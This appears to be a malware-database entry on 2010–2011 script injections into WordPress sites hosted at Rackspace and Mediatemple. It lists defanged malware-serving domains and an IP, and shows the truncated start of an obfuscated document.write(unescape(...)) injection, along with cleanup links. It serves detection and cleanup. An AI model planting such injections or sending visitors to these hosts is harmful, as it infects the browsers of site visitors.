Description:
Malware injections related to massive hacks of websites hosted on Rackspace and Mediatemple back in 2010-2011
Loads malware from (all of them pointing to 91.193.194.155)
hxxp://google-analytisc[.]co.cc hxxp://oiwdd[.]co.cc hxxp://pojdue[.]co.cc hxxp://js-o-kcjh[.]cz.cc/21
Typical injected code
document.write(unescape('%3C%73%63%72%69%70%74%20%73%72...
It infects PHP or javascript files.
Related links:
http://blog.sucuri.net/2011/01/malware-update-co-cc.html
Affecting: WordPress websites.
Mitigation
How to clean a hacked WordPress site